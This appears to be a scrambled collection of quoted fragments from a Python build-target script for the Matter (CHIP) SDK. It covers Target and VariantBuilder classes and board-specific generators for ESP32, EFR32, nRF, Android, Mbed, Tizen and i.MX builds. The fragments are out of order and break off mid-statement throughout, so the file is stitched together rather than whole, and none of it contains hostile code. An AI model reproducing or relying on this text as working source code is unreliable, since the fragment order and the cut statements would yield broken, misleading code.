\"\"\" Check", "build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL,", "compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append(", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "ok_variants = [ v for v in self.variants if v.validator.Accept(target.name)]", "app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default", "XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def", "support libreadline-dev') else: yield target # Without extra build variants", "only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist(", "Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running", "default on arm cross compiles # because libreadline is not", "[ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for", "app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target", "+= \", \" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason = reason", "clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path: str, output_prefix: str,", "out of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR,", "construction variants to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args))", "app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False))", "yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool',", "libreadline-dev') else: yield target # Without extra build variants yield", "# distributed under the License is distributed on an \"AS", "yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK)", "# Unless required by applicable law or agreed to in", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT))", "True return False class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(),", "board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder = VariantBuilder() for board_target", "is not None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName:", "to be created - no conflicts variant_target = target.Clone() for", "board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a',", "globbing whitelist targets. \"\"\" for target in self.targets: yield target", "K32WTargets(): target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True,", "return True return False class BuildVariant: def __init__(self, name: str,", "the Apache License, Version 2.0 (the \"License\"); # you may", "= target.Clone() for option in subgroup: variant_target = variant_target.Extend( option.name,", "Possible build variants. # NOTE: The number of potential builds", "\"\"\" Yields a list of acceptable variants for the given", "available = set([item.name for item in items]) for item in", "compiles # because libreadline is not part of the default", "Don't cross compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app',", "target = Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ]", "= target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc =", "subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs) # Only a few", "builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light',", "variants to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def", "AndroidTargets(): target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield", "item in items]) for item in items: for requirement in", "esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False)", "('nl-test-runner' in target.name): # Single-variant builds yield target else: builder.targets.append(target)", "import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder", "sysroot yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else: yield", "supports cross compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName()", "builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason):", "def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str):", "'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder", "import os from itertools import combinations from typing import List", "HostApp, HostBoard, HostBuilder from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from", "tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK,", "target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target", "requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for", "it (what builder class to use and what arguments are", "Possible build variants. Note that number of potential # builds", "enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"],", "builds is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\",", "= set([item.name for item in items]) for item in items:", "targets = [target_native] # x64 linux supports cross compile cross_compile", "a few are whitelisted for globs name = '-'.join([o.name for", "of the default sysroot yield target.GlobBlacklist('Arm crosscompile does not support", "ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target", "app=MbedApp.SHELL)) for target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop',", "devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc',", "note the clone in case the default arg is used", "target.name and 'arm64' in target.name and '-no-interactive' not in target.name:", "from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf import", "builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\",", "under the License is distributed on an \"AS IS\" BASIS,", "self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a clone of self.\"\"\"", "yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets():", "combinations(items, 2): if (a.name in b.conflicts) or (b.name in a.conflicts):", "= [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a',", "board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL)", "BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str] = [],", "in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed',", "board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'),", "build variants') yield variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)", "in range(1, len(ok_variants) + 1): for subgroup in combinations(ok_variants, variant_count):", "set([item.name for item in items]) for item in items: for", "Single-variant builds yield target else: builder.targets.append(target) for target in builder.AllVariants():", "cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL)", "app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)", "(what builder class to use and what arguments are required", "= VariantBuilder() # Possible build variants. Note that number of", "['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\",", "= validator self.conflicts = conflicts self.buildargs = buildargs self.requires =", "ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order overall", "variants. # NOTE: The number of potential builds is exponential", "is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings(", "v.validator.Accept(target.name)] # Build every possible variant for variant_count in range(1,", "and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light',", "AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import", "separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\",", "import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder", "forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets():", "cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and", "target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for all-clusters and lighting", "low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7',", "target.Clone() for option in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs)", "output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args)", "target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = []", "for target in builder.AllVariants(): yield target def NrfTargets(): target =", "= VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend(", "'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist(", "builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False),", "return clone def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle:", "False class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str]", "target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64,", "target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(),", "yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver',", "board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user", "target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets():", "def Bl602Targets(): target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT)", "os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason): clone =", "'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target = Target('android', AndroidBuilder) yield", "str, validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str] = [],", "app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order", "target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce", "None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a clone of", "item in items: for requirement in item.requires: if requirement not", "ANY KIND, either express or implied. # See the License", "= Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD,", "the License. # You may obtain a copy of the", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only',", "build variants and globbing whitelist targets. \"\"\" for target in", "# See the License for the specific language governing permissions", "self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self,", "build) \"\"\" def __init__(self, name, builder_class, **kwargs): self.name = name", "yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool',", "targets. Handles conflict resolution between build variants and globbing whitelist", "app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))", "yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators = [", "release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def", "'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets():", "are required to produce the specified build) \"\"\" def __init__(self,", "app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note that number", "= self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason +=", "= Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64,", "app_targets: if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or", "= [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist", "board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters',", "item.requires is satisfied for all items in the given list", "yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)", "of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False)", "variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]:", "# Don't cross compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append(", "for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile", "Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder class Target:", "app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target =", "builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\",", "self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs): \"\"\"Creates a clone", "target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86,", "= Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets", "in builder.AllVariants(): if cross_compile and 'chip-tool' in target.name and 'arm64'", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", "Authors # # Licensed under the Apache License, Version 2.0", "import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder", "Target: \"\"\"Represents a build target: Has a name identifier plus", "default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\")", "repository_path: str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path,", "ALL = [] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(),", "writing, software # distributed under the License is distributed on", "target in self.targets: yield target # skip variants that do", "a, b in combinations(items, 2): if (a.name in b.conflicts) or", "# limitations under the License. import os from itertools import", "+ suffix clone.create_kw_args.update(kargs) return clone def Create(self, runner, repository_path: str,", "user requested') ] builder = VariantBuilder() for board_target in board_targets:", "if s in name: return True return False class BuildVariant:", "IMXTargets(), ] for generator in target_generators: for target in generator:", "[] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(),", "else: yield target # Without extra build variants yield target_native.Extend('chip-cert',", "= self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier =", "exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']),", "app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell',", "of potential builds is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\",", "use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if", "License. import os from itertools import combinations from typing import", "target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in", "HostBoard, HostBuilder from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of", "app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators", "esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield", "yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets():", "list of acceptable variants for the given targets. Handles conflict", "yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder)", "target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets =", "Arguments: suffix: appended with a \"-\" as separator to the", "in target.name) or ('nl-test-runner' in target.name): # Single-variant builds yield", "app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets: yield", "board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)", "= buildargs self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool:", "NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),", "Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def Extend(self,", "compile by default on arm cross compiles # because libreadline", "bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self", "to the clone name **kargs: arguments needed to produce the", "in items: for requirement in item.requires: if requirement not in", "for item in items: for requirement in item.requires: if requirement", "governing permissions and # limitations under the License. import os", "Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand", "NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets", "board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL)", "= []): # note the clone in case the default", "the given targets. Handles conflict resolution between build variants and", "app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend( 'all-clusters',", "VariantBuilder() # Possible build variants. Note that number of potential", "return False return True class VariantBuilder: \"\"\"Handles creating multiple build", "yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release',", "return False class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts:", "on arm cross compiles # because libreadline is not part", "= Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD,", "board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)", "target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM,", "runner, repository_path: str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class(", "builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') 